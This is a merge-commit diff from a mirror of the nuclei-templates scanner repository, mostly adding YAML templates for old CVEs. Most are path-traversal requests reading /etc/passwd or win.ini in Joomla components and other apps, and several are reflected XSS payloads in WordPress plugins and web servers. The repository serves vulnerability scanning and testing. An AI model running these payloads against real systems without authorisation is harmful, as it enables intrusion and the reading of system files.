daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' into dynamic_attributes

patch-1
forgedhallpass 2021-08-19 16:23:26 +03:00
parent ffaff64565 a2dc11fc29
commit 7b29be739e
266 changed files with 7370 additions and 1775 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.github/workflows/templates-stats.yml vendored
View File

@ -9,6 +9,7 @@ on:
jobs:
build:
runs-on: ubuntu-latest
if: github.repository == 'projectdiscovery/nuclei-templates' && github.ref == 'refs/heads/master'
steps:
- name: Checkout Repo
uses: actions/checkout@master
@ -24,7 +25,7 @@ jobs:
env:
GO111MODULE: on
run: |
go get -v github.com/projectdiscovery/templates-stats
go get -v github.com/projectdiscovery/templates-stats@main
shell: bash
- name: Markdown Stats

3
.gitignore vendored
View File

@ -1,2 +1,5 @@
.idea/
.DS_Store
local/
.checksum
.new-additions

1
CONTRIBUTING.md
View File

@ -97,3 +97,4 @@ You can refer to the following articles of Git and GitHub basics. In case you ar
- **Nuclei** outcomes are only as excellent as **template matchers💡**
- Declare at least two matchers to reduce false positive
- Avoid matching words reflected in the URL to reduce false positive
- Avoid short word that could be encountered anywhere

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| tech | 101 | gaurang | 42 | workflows | 35 | | | | |
**138 directories, 1709 files**.
**144 directories, 1870 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

1349
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 511 | dhiyaneshdk | 220 | cves | 518 | info | 535 | http | 1566 |
| panel | 202 | pikpikcu | 195 | vulnerabilities | 246 | high | 426 | file | 42 |
| xss | 182 | pdteam | 187 | exposed-panels | 204 | medium | 349 | network | 35 |
| wordpress | 180 | dwisiswant0 | 126 | exposures | 168 | critical | 201 | dns | 10 |
| exposure | 176 | geeknik | 119 | technologies | 136 | low | 147 | | |
| rce | 173 | daffainfo | 99 | misconfiguration | 115 | | | | |
| cve2020 | 145 | madrobot | 60 | takeovers | 70 | | | | |
| lfi | 143 | princechaddha | 52 | default-logins | 49 | | | | |
| wp-plugin | 120 | gy741 | 48 | file | 42 | | | | |
| config | 90 | gaurang | 42 | workflows | 34 | | | | |
| cve | 590 | dhiyaneshdk | 239 | cves | 597 | info | 583 | http | 1720 |
| panel | 219 | pikpikcu | 237 | vulnerabilities | 265 | high | 465 | file | 46 |
| xss | 215 | pdteam | 194 | exposed-panels | 221 | medium | 387 | network | 35 |
| wordpress | 201 | daffainfo | 136 | exposures | 174 | critical | 226 | dns | 11 |
| exposure | 196 | dwisiswant0 | 128 | technologies | 159 | low | 156 | | |
| rce | 187 | geeknik | 127 | misconfiguration | 124 | | | | |
| lfi | 176 | gy741 | 68 | takeovers | 70 | | | | |
| cve2020 | 155 | madrobot | 60 | default-logins | 51 | | | | |
| wp-plugin | 136 | princechaddha | 53 | file | 46 | | | | |
| tech | 101 | gaurang | 42 | workflows | 35 | | | | |

26
cves/2005/CVE-2005-4385.yaml Normal file
View File

@ -0,0 +1,26 @@
id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
tags: cofax,xss,cve,cve2005
requests:
- method: GET
path:
- "{{BaseURL}}/search.htm?searchstring2=&searchstring=%27%3E%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "'>\"</script><script>alert(document.domain)</script>"

30
cves/2006/CVE-2006-1681.yaml Normal file
View File

@ -0,0 +1,30 @@
id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
tags: cherokee,httpd,xss,cve,cve2006
requests:
- method: GET
path:
- "{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html

27
cves/2008/CVE-2008-4668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4668
info:
name: Joomla! Component imagebrowser 0.1.5 rc2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-4764.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-4764
info:
name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
reference: |
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6172.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6172
info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference: |
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2008/CVE-2008-6668.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
requests:
- method: GET
path:
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
part: body
regex:
- "root:.*:0:0:"

27
cves/2009/CVE-2009-5114.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2009-5114
info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
reference: |
- https://www.exploit-db.com/exploits/36994
- https://www.cvedetails.com/cve/CVE-2009-5114
tags: cve,cve2009,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0943.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0943
info:
name: Joomla! Component com_jashowcase - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JA Showcase (com_jashowcase) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter in a jashowcase action to index.php.
reference: |
- https://www.exploit-db.com/exploits/11090
- https://www.cvedetails.com/cve/CVE-2010-0943
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-0944.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-0944
info:
name: Joomla! Component com_jcollection - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11088
- https://www.cvedetails.com/cve/CVE-2010-0944
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1353.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1353
info:
name: Joomla! Component LoginBox - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12068
- https://www.cvedetails.com/cve/CVE-2010-1353
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1474.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1474
info:
name: Joomla! Component Sweetykeeper 1.5 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) component 1.5.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12182
- https://www.cvedetails.com/cve/CVE-2010-1474
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1495.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1495
info:
name: Joomla! Component Matamko 1.01 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Matamko (com_matamko) component 1.01 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12286
- https://www.cvedetails.com/cve/CVE-2010-1495
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1602.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1602
info:
name: Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment) component 0.8.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12283
- https://www.cvedetails.com/cve/CVE-2010-1602
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1657.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1657
info:
name: Joomla! Component SmartSite 1.0.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the SmartSite (com_smartsite) component 1.0.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12428
- https://www.cvedetails.com/cve/CVE-2010-1657
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1722.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1722
info:
name: Joomla! Component Online Market 2.x - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Online Market (com_market) component 2.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12177
- https://www.cvedetails.com/cve/CVE-2010-1722
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1875.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1875
info:
name: Joomla! Component Property - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Real Estate Property (com_properties) component 3.1.22-03 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/11851
- https://www.cvedetails.com/cve/CVE-2010-1875
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1953.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1953
info:
name: Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the iNetLanka Multiple Map (com_multimap) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12288
- https://www.cvedetails.com/cve/CVE-2010-1953
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1955.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1955
info:
name: Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Deluxe Blog Factory (com_blogfactory) component 1.1.2 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12238
- https://www.cvedetails.com/cve/CVE-2010-1955
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1979.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1979
info:
name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/12088
- https://www.cvedetails.com/cve/CVE-2010-1979
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-1983.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-1983
info:
name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
reference: |
- https://www.exploit-db.com/exploits/12055
- https://www.cvedetails.com/cve/CVE-2010-1983
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2033.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2033
info:
name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- https://www.cvedetails.com/cve/CVE-2010-2033
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2259.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2259
info:
name: Joomla! Component com_bfsurvey - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/10946
- https://www.cvedetails.com/cve/CVE-2010-2259
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-2682.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-2682
info:
name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/14017
- https://www.cvedetails.com/cve/CVE-2010-2682
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2010/CVE-2010-4617.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/15791
- https://www.cvedetails.com/cve/CVE-2010-4617
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

29
cves/2010/CVE-2010-5278.yaml Normal file
View File

@ -0,0 +1,29 @@
id: CVE-2010-5278
info:
name: MODx manager - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key parameter.
reference: |
- https://www.exploit-db.com/exploits/34788
- https://www.cvedetails.com/cve/CVE-2010-5278
tags: cve,cve2010,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body

33
cves/2011/CVE-2011-4336.yaml Normal file
View File

@ -0,0 +1,33 @@
id: CVE-2011-4336
info:
name: Tiki Wiki CMS Groupware 7.0 has XSS
author: pikpikcu
severity: medium
description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
reference: |
- https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- https://www.securityfocus.com/bid/48806/info
- https://seclists.org/bugtraq/2011/Nov/140
tags: cve,cve2011,xss,tikiwiki
requests:
- method: GET
path:
- "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: status
status:
- 200
- type: word
part: header
words:
- text/html

27
cves/2011/CVE-2011-4804.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2011-4804
info:
name: Joomla! Component com_kp - 'Controller' Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/36598
- https://www.cvedetails.com/cve/CVE-2011-4804
tags: cve,cve2011,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-0991.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-0991
info:
name: OpenEMR 4.1 - Local File Inclusion
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in OpenEMR 4.1.0 allow remote authenticated users to read arbitrary files via a .. (dot dot) in the formname parameter to (1) contrib/acog/print_form.php; or (2) load_form.php, (3) view_form.php, or (4) trend_form.php in interface/patient_file/encounter.
reference: |
- https://www.exploit-db.com/exploits/36650
- https://www.cvedetails.com/cve/CVE-2012-0991
tags: cve,cve2012,lfi,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/contrib/acog/print_form.php?formname=../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

27
cves/2012/CVE-2012-4253.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CVE-2012-4253
info:
name: MySQLDumper 1.24.4 - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
reference: |
- https://www.exploit-db.com/exploits/37129
- https://www.cvedetails.com/cve/CVE-2012-4253
tags: cve,cve2012,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

28
cves/2013/CVE-2013-5979.yaml Normal file
View File

@ -0,0 +1,28 @@
id: CVE-2013-5979
info:
name: Xibo 1.2.2/1.4.1 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
reference: |
- https://www.exploit-db.com/exploits/26955
- https://www.cvedetails.com/cve/CVE-2013-5979
- https://bugs.launchpad.net/xibo/+bug/1093967
tags: cve,cve2013,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200

31
cves/2014/CVE-2014-4535.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4535
info:
name: Import Legacy Media <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/7fb78d3c-f784-4630-ad92-d33e5de814fd
- https://nvd.nist.gov/vuln/detail/CVE-2014-4535
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/importlegacymedia/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- "'></script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

31
cves/2014/CVE-2014-4536.yaml Normal file
View File

@ -0,0 +1,31 @@
id: CVE-2014-4536
info:
name: Infusionsoft Gravity Forms Add-on < 1.5.7 - Unauthenticated Reflected XSS
author: daffainfo
severity: medium
reference: |
- https://wpscan.com/vulnerability/f048b5cc-5379-4c19-9a43-cd8c49c8129f
- https://nvd.nist.gov/vuln/detail/CVE-2014-4536
tags: cve,cve2014,wordpress,wp-plugin,xss
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"
matchers-condition: and
matchers:
- type: word
words:
- '"></script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

25
cves/2014/CVE-2014-4940.yaml Normal file
View File

@ -0,0 +1,25 @@
id: CVE-2014-4940
info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
